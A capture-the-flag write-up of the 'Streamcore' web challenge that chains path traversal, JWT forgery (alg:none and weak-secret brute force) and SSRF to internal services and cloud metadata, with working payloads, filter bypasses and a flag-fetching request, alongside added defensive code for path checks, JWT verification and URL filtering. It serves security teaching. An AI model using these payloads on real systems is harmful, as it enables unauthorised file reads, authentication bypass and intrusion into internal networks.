
Introduction:
The YesWeHack Dojo’s latest Capture The Flag (CTF) challenge, “Streamcore,” simulates a video streaming service with a seemingly simple interface. Beneath that surface sits a chain of vulnerabilities (improper token handling and an insecure file-loading mechanism) that an attacker must combine to reach restricted resources. This article dissects the technical path to compromise, walking through how each weakness is identified and exploited, and draws out the defensive lessons for modern web applications.
Learning Objectives:
- Objective 1: Understand and exploit Path Traversal vulnerabilities in file-loading functionalities.
- Objective 2: Analyze and forge JSON Web Tokens (JWTs) by exploiting weak signing algorithms (e.g., `none` algorithm) or brute-forcing weak secrets.
- Objective 3: Master Server-Side Request Forgery (SSRF) attacks to pivot from a video stream processor to internal network services.
You Should Know:
- Mapping the Attack Surface: From Video Player to Local File Disclosure
The CTF presents a video streaming service that loads media files using a parameter in the URL, such as `https://streamcore.ctf/load?file=video.mp4`. The first critical step is testing for a Path Traversal vulnerability, which allows an attacker to read arbitrary files from the server’s filesystem.
Understanding the Vulnerability:
If the application does not properly sanitize the `file` parameter, an attacker can use sequences like `../` (dot-dot-slash) to move up directories and access sensitive files, such as the application’s source code or configuration files. For example:
https://streamcore.ctf/load?file=../../../../etc/passwd
https://streamcore.ctf/load?file=....//....//....//etc/passwd   (bypasses filters that strip a single `../`)
On Windows systems, similar sequences such as `..\`, or URL-encoded forms (`%2e%2e%2f`), may be required.
Step‑by‑Step Exploitation Guide:
1. Identify the File-Loading Endpoint: Intercept the request made when a video loads, using a proxy such as Burp Suite or OWASP ZAP. Look for parameters named `file`, `path`, `document`, `load`, or `stream`.
2. Inject Path Traversal Payloads: Send crafted payloads to the endpoint to read the application’s source code, typically `app.js`, `index.php`, or `server.py`.
Linux/macOS payload:
curl -k "https://streamcore.ctf/load?file=../../../../app.py"
Windows payload (if the server is Windows-based):
curl -k "https://streamcore.ctf/load?file=..\..\..\..\Windows\win.ini"
3. Bypass Common Defenses: If simple traversal is blocked, try:
– URL Encoding: `%2e%2e%2f` for `../`
– Double URL Encoding: `%252e%252e%252f`
– Absolute Paths: `file:///etc/passwd`
– Null Byte Injection (legacy): `../../../etc/passwd%00.jpg`
4. Analyze the Leaked Source Code: After successfully reading a file such as `server.py` or `auth.js`, search for hardcoded credentials, API keys, and, most critically, the token generation logic. This often reveals how the application creates and validates JWTs.
In the Streamcore CTF, this initial traversal exposes the token generation mechanism, showing that the server uses a weak, guessable secret for its JWTs.
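The defensive counterpart to the traversal step above, as an added example that is not part of the CTF or the write-up: a file loader that decides on the canonical path rather than on the raw `file` string. The media directory `/srv/streamcore/media` and the function names are assumptions for illustration.

```python
import os
from typing import Optional
from urllib.parse import unquote

# Assumed media directory; the CTF's real layout is not known.
MEDIA_ROOT = "/srv/streamcore/media"

def decode_fully(value: str, max_rounds: int = 3) -> str:
    """Undo repeated percent-encoding so %252e%252e%252f is judged as ../ too."""
    for _ in range(max_rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def resolve_media_path(file_param: str, root: str = MEDIA_ROOT) -> Optional[str]:
    """Return the absolute file to serve, or None to refuse the request.
    The decision is made on the canonical path, never on the raw string, so
    ../, ....//, encoded dots and symlinks are all judged the same way."""
    name = decode_fully(file_param)
    if "\x00" in name or "\\" in name:       # null-byte truncation, Windows separators
        return None
    if os.path.isabs(name) or ":" in name:   # /etc/passwd, file:///..., C:\...
        return None
    root_real = os.path.realpath(root)
    candidate = os.path.realpath(os.path.join(root_real, name))
    # Containment by path component: plain startswith() would accept
    # /srv/streamcore/media-old as being inside /srv/streamcore/media.
    if os.path.commonpath([root_real, candidate]) != root_real:
        return None
    return candidate

if __name__ == "__main__":
    # Constructed requests, including the payloads quoted in the write-up.
    for p in ["video.mp4", "../../../../etc/passwd", "%2e%2e%2f%2e%2e%2fetc/passwd",
              "%252e%252e%252fetc/passwd", "....//....//etc/passwd",
              "../../../etc/passwd%00.jpg", "file:///etc/passwd"]:
        print(f"{p!r:40} -> {resolve_media_path(p)}")
```

Note that `....//....//etc/passwd` resolves to a harmless path inside the root here: that payload only works against filters that strip `../` and serve whatever remains.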
- Breaking the Bearer: JWT Algorithm Confusion and Secret Brute-Forcing
Once the source code is obtained, the next phase involves manipulating the JSON Web Token (JWT) used for authentication or authorization. A common misconfiguration is accepting the `none` algorithm or using a weak HMAC secret.
Step‑by‑Step JWT Exploitation Guide:
- Extract and Decode the JWT: Locate the token from the `Authorization` header or a cookie. Use `jwt_tool` or the online debugger (jwt.io) to decode its payload.
Using jwt_tool to decode and analyze a token:
python3 jwt_tool.py <JWT_TOKEN>
- Check for the `none` Algorithm Vulnerability: Tamper with the token’s header, changing the `alg` field to `none` and removing the signature part. This tricks the server into accepting the modified token.
Python snippet (PyJWT) to create an `alg: none` token:
import jwt
token = jwt.encode({"user": "admin", "role": "admin"}, key="", algorithm="none")
print(token)
- Brute-Force a Weak HMAC Secret: If the algorithm is HS256, use a tool such as `hashcat` or `john` to crack the secret from a valid token-signature pair.
Using jwt_tool to brute-force the secret with a wordlist:
python3 jwt_tool.py <JWT_TOKEN> -C -d /usr/share/wordlists/rockyou.txt
- Forge an Administrative Token: Once you have the secret or have confirmed the `none` vulnerability, craft a new token with elevated privileges (e.g., change the role to `admin`). Send this forged token in a new request to an internal administrative endpoint, such as `/admin/debug`, disclosed in the leaked source code.
This forged token in Streamcore opens access to an internal service that was previously unreachable, setting the stage for the final exploitation phase.
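How a verifier closes both JWT holes described above (the `none` algorithm and a guessable HMAC secret), as an added example written for this article rather than code from the CTF: the algorithm is pinned on the server side and the secret is generated, not typed. Function names are assumptions; the signing helper exists only to build sample tokens.

```python
import base64
import hashlib
import hmac
import json
import secrets
from typing import Optional

def b64url_encode(raw: bytes) -> str:
    return base64.urlsafe_b64encode(raw).rstrip(b"=").decode()

def b64url_decode(part: str) -> bytes:
    return base64.urlsafe_b64decode(part + "=" * (-len(part) % 4))

def new_secret() -> bytes:
    """256 random bits: an HS256 key that no wordlist-based cracker will hit."""
    return secrets.token_bytes(32)

def sign_hs256(claims: dict, secret: bytes) -> str:
    """Issue a token (the server side); used here to build the sample inputs."""
    header = b64url_encode(b'{"alg":"HS256","typ":"JWT"}')
    body = b64url_encode(json.dumps(claims, separators=(",", ":")).encode())
    sig = hmac.new(secret, f"{header}.{body}".encode(), hashlib.sha256).digest()
    return f"{header}.{body}.{b64url_encode(sig)}"

def verify_hs256(token: str, secret: bytes) -> Optional[dict]:
    """Return the claims only if the token carries a valid HS256 signature.
    The algorithm is fixed here and never taken from the token, so an alg:none
    header (or any alg swap) is refused before any crypto runs. With PyJWT the
    equivalent is jwt.decode(token, key, algorithms=["HS256"])."""
    parts = token.split(".")
    if len(parts) != 3 or not parts[2]:      # the alg:none shape: empty signature
        return None
    try:
        header = json.loads(b64url_decode(parts[0]))
        if header.get("alg") != "HS256":
            return None
        signed = f"{parts[0]}.{parts[1]}".encode()
        expected = hmac.new(secret, signed, hashlib.sha256).digest()
        if not hmac.compare_digest(expected, b64url_decode(parts[2])):
            return None
        claims = json.loads(b64url_decode(parts[1]))
        return claims if isinstance(claims, dict) else None
    except (ValueError, UnicodeDecodeError, AttributeError):
        return None
```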
- Pivoting with SSRF: Streaming Your Way to Internal Endpoints
With an admin JWT, the CTF reveals a new function: a `stream_debug` endpoint that allows the user to provide a URL for the server to fetch and process. This is a classic Server-Side Request Forgery (SSRF) vulnerability. The goal is to abuse this privileged service to interact with internal infrastructure.
Step‑by‑Step SSRF Exploitation Guide:
1. Locate the SSRF Primitives: After authenticating with the forged token, navigate to functions like “Import from URL,” “Fetch Metadata,” or any feature that instructs the server to download a resource from a user-supplied address.
2. Probe the Internal Network: Start by having the server fetch a URL you control to confirm connectivity (e.g., `https://your-server.com/callback`). Then scan for internal IP addresses and ports.
Common internal addresses to test for SSRF:
http://127.0.0.1:80
http://127.0.0.1:8080
http://169.254.169.254/latest/meta-data/   (cloud metadata)
http://192.168.1.1/config
3. Bypass Allowlist Restrictions: If the server uses a basic allowlist, bypass it using techniques like:
– Redirects: Host a server that redirects to `http://127.0.0.1/admin`.
– DNS Rebinding: Point a domain to a public IP, then switch it to an internal IP.
– Alternative Representations: Use `http://0.0.0.0` or `http://localhost` instead of `127.0.0.1`.
– URL Parser Inconsistencies: Try `http://2130706433/` (the decimal form of 127.0.0.1).
4. Read the Flag: The internal service the CTF protects is likely a simple HTTP server on `localhost:8080` that requires a specific `X-Internal-API-Key` header. The forged JWT might have already granted you that key. Use the SSRF to request the flag endpoint.
Example SSRF payload targeting an internal API that returns the flag:
POST /stream_debug HTTP/1.1
Host: streamcore.ctf
Authorization: Bearer <FORGED_ADMIN_JWT>
Content-Type: application/json

{"url": "http://127.0.0.1:8080/admin/flag"}
By successfully chaining the path traversal, JWT attack, and SSRF, the flag is exfiltrated via the server’s own request to itself, completely bypassing external access controls.
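A destination check for a URL-fetching feature like `stream_debug`, added here as an example and not taken from the CTF or the write-up. It covers the bypasses listed above (decimal IPs, `0.0.0.0`, `localhost`, IPv4-mapped IPv6, the metadata address, and names that resolve to internal hosts), and the `resolver` parameter is an assumption that lets the lookup be stubbed offline.

```python
import ipaddress
import socket
from typing import Callable, List, Optional
from urllib.parse import urlsplit

def default_resolver(host: str) -> List[str]:
    """Every address the OS would connect to for this name (A and AAAA)."""
    return sorted({info[4][0] for info in socket.getaddrinfo(host, None)})

def literal_ip(host: str):
    """Dotted/IPv6 literals plus the bare-decimal form (2130706433), which
    inet_aton maps to 127.0.0.1 but a string filter never sees as an IP."""
    try:
        return ipaddress.ip_address(int(host) if host.isdigit() else host)
    except ValueError:
        return None

def is_forbidden(ip) -> bool:
    """Loopback, RFC 1918, link-local (cloud metadata), 0.0.0.0 and similar."""
    if isinstance(ip, ipaddress.IPv6Address) and ip.ipv4_mapped:
        ip = ip.ipv4_mapped                      # ::ffff:127.0.0.1 is still loopback
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_unspecified or ip.is_reserved or ip.is_multicast)

def check_fetch_target(url: str, resolver: Callable[[str], List[str]] = default_resolver) -> Optional[str]:
    """Return why the URL must not be fetched, or None if it may be. Re-run on
    every redirect hop and connect to the address that was checked, not to a
    fresh lookup, or redirects and DNS rebinding walk around the check."""
    parts = urlsplit(url)
    if parts.scheme not in ("http", "https"):
        return "scheme not allowed"
    if not parts.hostname:
        return "no host"
    try:
        if parts.port not in (None, 80, 443):
            return "port not allowed"            # e.g. the :8080 debug service
    except ValueError:
        return "invalid port"
    ip = literal_ip(parts.hostname)
    if ip is not None:
        addrs = [ip]
    else:
        try:
            addrs = [ipaddress.ip_address(a) for a in resolver(parts.hostname)]
        except (socket.gaierror, ValueError):
            addrs = []
    if not addrs:
        return "unresolvable host"
    bad = [a for a in addrs if is_forbidden(a)]  # every record must be public
    return f"resolves to forbidden address {bad[0]}" if bad else None
```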
What Undercode Say:
- Key Takeaway 1: Modern CTF chains are not about single, isolated bugs but about the creative interconnection of multiple small misconfigurations, each acting as a link in a larger kill chain.
- Key Takeaway 2: Defenders must adopt an “assume breach” mentality and implement defense-in-depth; a path traversal bug should not lead to a JWT secret, and an SSRF primitive should never be placed in an admin-only function without rigorous allowlisting and network segmentation.
Analysis: This CTF brilliantly mirrors real-world attack paths observed in complex web applications. The progression from information disclosure (path traversal) to privilege escalation (JWT manipulation) to internal network pivoting (SSRF) is a textbook example of how seemingly low-severity issues accumulate into a critical compromise. The ultimate lesson is that each layer of security must be independent. Using a weak JWT secret nullifies authentication, and exposing internal debugging functions behind a compromised token nullifies network isolation. This demonstrates a core principle: isolation and secrets are only as strong as the weakest link in their implementation chain.
Prediction:
- -1 As AI-assisted coding becomes mainstream, the prevalence of hardcoded secrets and weak algorithm support in JWT libraries may temporarily increase, as developers rely on auto-complete without security context, leading to a resurgence of these specific vulnerability chains.
- +1 The growing maturity of automated API security testing tools (e.g., Burp Suite’s BChecks, custom Nuclei templates) will soon make the detection of complex, multi-stage chains like “Path Traversal -> JWT Weakness -> SSRF” a standard CI/CD gate, drastically reducing their presence in production environments.
Reported By: New Ctf – Hackers Feeds